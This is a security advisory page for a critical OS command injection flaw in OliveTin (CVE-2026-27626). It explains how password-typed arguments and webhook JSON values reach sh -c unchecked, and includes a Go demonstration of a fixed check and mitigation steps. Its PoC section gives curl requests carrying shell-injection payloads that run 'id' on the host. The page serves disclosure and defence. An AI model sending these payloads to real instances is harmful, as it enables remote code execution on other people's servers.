🐹 Go

GHSA-49gm-hh7w-wfvf

CRITICAL

OliveTin: OS Command Injection via `password` argument type and webhook JSON extraction bypasses shell safety checks

Also known as CVE-2026-27626, GO-2026-4547
Published
Feb 25, 2026
Updated
Feb 28, 2026
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed

EPSS Exploitation Probability

via FIRST.org ↗
0.4% probability of exploitation in next 30 days
Lower Risk (36th percentile), +0.27% change
[EPSS history chart, Mar 26 to Jun 26: 0.1%, 0.2%, 0.2%, 0.2%, 0.4%]

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected
🐹 github.com/OliveTin/OliveTin

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Summary

OliveTin's shell mode safety check (checkShellArgumentSafety) blocks several dangerous argument types but not password. A user supplying a password-typed argument can inject shell metacharacters that execute arbitrary OS commands. A second independent vector allows unauthenticated RCE via webhook-extracted JSON values that skip type safety checks entirely before reaching sh -c.

Details

Vector 1 — password type bypasses shell safety check (PR:L)

service/internal/executor/arguments.go has two gaps:

```go
// Line 198-199 — TypeSafetyCheck returns nil (no error) for password type
case "password":
    return nil // accepts ANY string including ; | ` $()

// Line 313 — checkShellArgumentSafety blocks dangerous types but not password
unsafe := map[string]bool{
    "url":                       true,
    "email":                     true,
    "raw_string_multiline":      true,
    "very_dangerous_raw_string": true,
    // "password" is absent — not blocked
}
```

Shell execution at service/internal/executor/executor_unix.go:18:

```go
exec.CommandContext(ctx, "sh", "-c", finalParsedCommand)
```

A user supplies a password argument value of `'; id; echo '`. Because the rendered command string is handed to sh -c, the shell interprets the closing quote and the `;` separators, so `id` (or any other command) runs on the host.

This is not the "admin already has access" pattern: OliveTin explicitly enforces an admin/user boundary where admins define commands and users only supply argument values. The password type is the documented, intended mechanism for user-supplied sensitive values. The safety check exists precisely to prevent users from escaping this boundary — password is the one type it fails to block.

Vector 2 — Webhook JSON extraction skips TypeSafetyCheck entirely (PR:N)

service/internal/executor/handler.go:153-157 extracts arbitrary key-value pairs from webhook JSON payloads and injects them into ExecutionRequest.Arguments. These webhook-extracted arguments have no corresponding config-defined ActionArgument entry, so parseActionArguments() in arguments.go finds no type to check against and skips TypeSafetyCheck entirely. The values are templated directly into the shell command and passed to sh -c.

Example: an admin command template git pull && echo {{ git_message }} with Shell mode enabled. A webhook POST with {"git_message": "x; id"} injects id into the shell command. The webhook endpoint is unauthenticated by default (authType: none in default config).
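Both vectors come down to the same missing checks in the argument path: an undeclared name must not be accepted at all, and a free-form type must not be templated into a string that sh -c will parse. The following Go program is an added example, not OliveTin's own code: it models the two checks side by side, with a vulnerable variant that reproduces the gaps the advisory describes and a hardened variant that closes them. The `Action`, `ActionArgument`, `render`, `legacyUnsafe` and `fixedUnsafe` names, the `{{ name }}` placeholder syntax and the sample payloads are assumptions for this example.

```go
package main

import (
	"fmt"
	"strings"
)

// ActionArgument is an admin-declared argument (name and type). Users may only
// supply values for declared names. Type names here are assumptions for this
// example, not OliveTin's own definitions.
type ActionArgument struct {
	Name string
	Type string
}

// Action is an admin-defined command. In Shell mode the rendered template is
// handed to sh -c, which is the execution path the advisory describes.
type Action struct {
	ID        string
	Shell     string // template with {{ name }} placeholders
	ShellMode bool
	Arguments []ActionArgument
}

func (a *Action) find(name string) *ActionArgument {
	for i := range a.Arguments {
		if a.Arguments[i].Name == name {
			return &a.Arguments[i]
		}
	}
	return nil
}

// legacyUnsafe is the block list as the advisory quotes it: password is absent.
var legacyUnsafe = map[string]bool{
	"url": true, "email": true,
	"raw_string_multiline": true, "very_dangerous_raw_string": true,
}

// fixedUnsafe adds password, so every free-form type is refused in Shell mode.
var fixedUnsafe = map[string]bool{
	"url": true, "email": true,
	"raw_string_multiline": true, "very_dangerous_raw_string": true,
	"password": true,
}

// shellMeta: any of these lets a value break out of the token it was
// templated into once sh -c parses the rendered string.
const shellMeta = "`$;|&<>(){}\n\r'\"\\ \t*?[]~#"

// vulnerableCheck reproduces the two gaps. Undeclared names (webhook-extracted
// keys) have no type and are not checked at all; password values pass verbatim.
func vulnerableCheck(a *Action, name, value string) error {
	arg := a.find(name)
	if arg == nil {
		return nil // vector 2: no ActionArgument, so the type check is skipped
	}
	if a.ShellMode && legacyUnsafe[arg.Type] {
		return fmt.Errorf("argument %q: type %s not allowed in shell mode", name, arg.Type)
	}
	return nil // vector 1: "password" is not in the set and falls through
}

// hardenedCheck closes both gaps: undeclared names are rejected, free-form types
// (password included) are refused in Shell mode, and as defence in depth any
// value that still reaches a shell is refused if it carries metacharacters.
func hardenedCheck(a *Action, name, value string) error {
	arg := a.find(name)
	if arg == nil {
		return fmt.Errorf("argument %q is not declared for action %s", name, a.ID)
	}
	if !a.ShellMode {
		return nil
	}
	if fixedUnsafe[arg.Type] {
		return fmt.Errorf("argument %q: type %s not allowed in shell mode", name, arg.Type)
	}
	if strings.ContainsAny(value, shellMeta) {
		return fmt.Errorf("argument %q: value contains shell metacharacters", name)
	}
	return nil
}

// render runs check on every supplied value, then substitutes the placeholders.
// The returned string is exactly what sh -c would receive.
func render(a *Action, supplied map[string]string, check func(*Action, string, string) error) (string, error) {
	out := a.Shell
	for name, value := range supplied {
		if err := check(a, name, value); err != nil {
			return "", err
		}
		out = strings.ReplaceAll(out, "{{ "+name+" }}", value)
	}
	return out, nil
}

func main() {
	// Vector 1: declared password argument with an attacker-chosen value (constructed input).
	deploy := &Action{ID: "run-command", Shell: "deploy --pass '{{ pass }}'", ShellMode: true,
		Arguments: []ActionArgument{{Name: "pass", Type: "password"}}}
	pass := map[string]string{"pass": "'; id; echo '"}
	// Vector 2: webhook key with no declared ActionArgument (constructed payload).
	git := &Action{ID: "git-deploy", Shell: "git pull && echo {{ git_message }}", ShellMode: true}
	hook := map[string]string{"git_message": "x; id #"}

	for _, check := range []struct {
		label string
		fn    func(*Action, string, string) error
	}{{"vulnerable", vulnerableCheck}, {"hardened", hardenedCheck}} {
		cmd, err := render(deploy, pass, check.fn)
		fmt.Printf("%-10s vector 1: cmd=%q err=%v\n", check.label, cmd, err)
		cmd, err = render(git, hook, check.fn)
		fmt.Printf("%-10s vector 2: cmd=%q err=%v\n", check.label, cmd, err)
	}
}
```

With the vulnerable check, vector 1 renders `deploy --pass ''; id; echo ''` and vector 2 renders `git pull && echo x; id #`, both of which sh -c executes as three and two commands respectively; the hardened check refuses both before anything is rendered. The metacharacter scan is only defence in depth. The structural fix is to stop routing user-supplied values through sh -c at all: build an argv slice and call exec.CommandContext(ctx, program, args...), so the value is a single argument that no shell ever parses.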

PoC

```bash
# Vector 1 — authenticated user with password-type argument
# The JSON is fed from a quoted heredoc so the single quotes inside the
# value reach the server intact instead of terminating the shell string.
curl -X POST http://localhost:1337/api/StartAction \
  -H "Content-Type: application/json" \
  -d @- <<'EOF'
{"actionId": "run-command", "arguments": [{"name": "pass", "value": "'; id; echo '"}]}
EOF

# Vector 2 — unauthenticated webhook
curl -X POST http://localhost:1337/webhook/git-deploy \
  -H "Content-Type: application/json" \
  -d '{"git_message": "x; id #", "git_author": "attacker"}'
```

Confirmed on jamesread/olivetin:latest (3000.10.0), 3/3 runs. Both vectors produced uid=1000(olivetin) output and arbitrary file write to /tmp/pwned.

Impact

  • Vector 1: Any authenticated user (registration enabled by default, authType: none by default) can execute arbitrary OS commands on the OliveTin host with the permissions of the OliveTin process.
  • Vector 2: Unauthenticated attacker can achieve the same if the instance receives webhooks from external sources, which is a primary OliveTin use case.

Combined: unauthenticated RCE on any OliveTin instance using Shell mode with webhook-triggered actions.

Affected Packages

1 total, 1 fixed

Ecosystem  Package                        Vulnerable range  Fix
Go         github.com/OliveTin/OliveTin   all versions      0.0.0-20260222101908-4bbd2eab1532

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree for github.com/OliveTin/OliveTin. For a Go project that means go.mod and go.sum; OliveTin is also commonly deployed as the jamesread/olivetin container image (the advisory reproduces the issue on tag 3000.10.0), so check the version of the running image as well, not only build manifests. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

  2. Fix

    Update github.com/OliveTin/OliveTin to 0.0.0-20260222101908-4bbd2eab1532 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-49gm-hh7w-wfvf is resolved across your whole dependency graph.

  3. Workarounds

    If you can't upgrade right away: both vectors require Shell mode, so disable Shell mode for any action that accepts user-supplied or webhook-supplied arguments; do not expose password-typed arguments on Shell-mode actions; require authentication on webhook endpoints instead of the default authType: none; and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

  4. How O3 protects you

    O3 pinpoints whether GHSA-49gm-hh7w-wfvf is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-49gm-hh7w-wfvf. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

O3 Security · Impact-Aware SCA
